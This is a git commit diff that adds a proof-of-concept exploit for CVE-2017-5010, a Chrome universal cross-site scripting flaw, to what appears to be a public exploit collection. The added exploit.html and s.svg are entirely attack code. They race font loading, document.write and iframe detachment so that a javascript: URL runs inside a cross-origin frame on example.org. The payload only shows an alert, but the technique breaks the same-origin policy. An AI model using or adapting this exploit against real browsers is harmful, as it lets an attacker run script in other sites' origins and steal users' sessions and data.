feat(chrome): add CVE-2017-5010

Metnew · Metnew · commit f7078cd13948 · 2018-05-24T04:19:39.000+03:00
diff --git a/chrome/CVE-2017-5010/c64.ttf b/chrome/CVE-2017-5010/c64.ttf
diff --git a/chrome/CVE-2017-5010/exploit.html b/chrome/CVE-2017-5010/exploit.html
@@ -0,0 +1,73 @@
+<script>
+if (location.protocol == 'file:') {
+  throw alert('HTTP server is required.');
+}
+
+if (location.hash != '') {
+  location.hash = '';
+  throw location.reload();
+}
+
+function start() {
+  document.open();
+  document.write("<style>");
+  document.write("@font-face { font-family: f1; src: url(c64.ttf); }");
+  document.write("@font-face { font-family: f2; src: url(c64.ttf); }");
+  document.write("</style>a");
+
+  var counter = 0;
+  function t() {
+    switch (counter++) {
+      case 0:
+        document.write("<x>");
+        document.write("<link rel='stylesheet' type='text/css' href='foo.css'>");
+        document.write("<iframe></iframe>");
+        document.write("</x>");
+        document.write("<style></style>");
+        location.hash = 'top';
+        var s = f1.status == 'loading' ? 'f1' : 'f2';
+        if (f1.status != 'loading' && f2.status != 'loading') { alert('Never happens.'); }
+        document.documentElement.setAttribute('style', 'font-family:' + s);
+        i = document.querySelector('iframe');
+        l = i.previousSibling;
+        p = i.parentNode;
+        p.remove();
+        if (f1.status != 'loaded' || f2.status != 'loaded') { alert('Never happens.'); }
+        setTimeout(g, 1);
+        break;
+      case 1:
+        p.appendChild(l);
+        break;
+      default:
+        throw alert('Not reached.');
+    }
+  }
+
+  var fonts = document.fonts.keys();
+  var f1 = fonts.next().value;
+  var f2 = fonts.next().value;
+  f1.load();
+  f2.load();
+  if (f1.status != 'loading') { throw alert('The font is cached, please force reload (Ctrl+F5).'); }
+  f1.__proto__.__defineGetter__('then', t);
+}
+
+function g() {
+  i.src = 'https://example.org';
+  v = setInterval(c, 1);
+}
+
+function c() {
+  try {
+    i.contentDocument;
+  } catch(e) {
+    clearInterval(v);
+    i.src = 'javascript:alert(location)';
+    x = document.body.appendChild(document.createElement('iframe'));
+    x.style = 'display:none';
+    x.src = 's.svg';
+  }
+}
+
+onload = start;
+</script>
diff --git a/chrome/CVE-2017-5010/s.svg b/chrome/CVE-2017-5010/s.svg
@@ -0,0 +1,9 @@
+<svg xmlns="http://www.w3.org/2000/svg">
+<iframe xmlns="http://www.w3.org/1999/xhtml"></iframe>
+<script>
+frames[0].onunload = function() {
+  frames[0].frameElement.appendChild(top.i.parentNode);
+}
+</script>
+<element a="1" a="2" />
+</svg>
